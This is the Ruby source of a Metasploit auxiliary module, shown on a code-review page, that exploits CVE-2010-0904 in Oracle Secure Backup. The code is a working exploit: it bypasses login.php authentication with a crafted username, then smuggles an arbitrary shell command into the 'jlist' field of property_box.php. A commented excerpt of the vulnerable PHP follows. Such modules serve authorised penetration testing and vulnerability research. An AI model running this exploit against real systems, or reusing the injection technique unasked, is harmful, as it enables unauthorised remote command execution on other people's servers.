rapid7/metasploit-framework

View on GitHub
modules/auxiliary/admin/oracle/osb_execqr3.rb

Summary

Maintainability
A
1 hr
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
      'Description'    => %q{
          This module exploits an authentication bypass vulnerability
        in login.php in order to execute arbitrary code via a command injection
        vulnerability in property_box.php. This module was tested
        against Oracle Secure Backup version 10.3.0.1.0 (Win32).
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-0904' ],
          [ 'OSVDB', '66338'],
          [ 'ZDI', '10-118' ],
        ],
      'DisclosureDate' => '2010-07-13'))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('CMD', [ false, "The command to execute.", "cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt" ]),
        OptBool.new('SSL',   [true, 'Use SSL', true]),
      ])
  end

  def run
    cmd = datastore['CMD']

    res = send_request_cgi(
      {
        'uri'    =>  '/login.php',
        'data'    =>  'attempt=1&uname=-',
        'method' => 'POST',
      }, 5)

      if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)

          print_status("Sending command: #{datastore['CMD']}...")

          send_request_cgi(
            {
              'uri'    => '/property_box.php',
              'data'  => 'type=Job&jlist=' + Rex::Text.uri_encode('&' + cmd),
              'cookie' => res.get_cookies,
              'method' => 'POST',
            }, 5)

        print_status("Done.")
      else
        print_error("Invalid PHPSESSION token..")
        return
      end
  end
end
=begin
  else if (strcmp($type, "Job") == 0)
    {
    if (!is_array($objectname))
      $objectname = array();
    reset($objectname);
    while (list(,$oname) = each($objectname))
      {
      $oname = escapeshellarg($oname);
      $jlist = "$jlist $oname";
      }
    if (strlen($jlist) > 0)
      $msg = exec_qr("$rbtool lsjob -lrRLC $jlist");
=end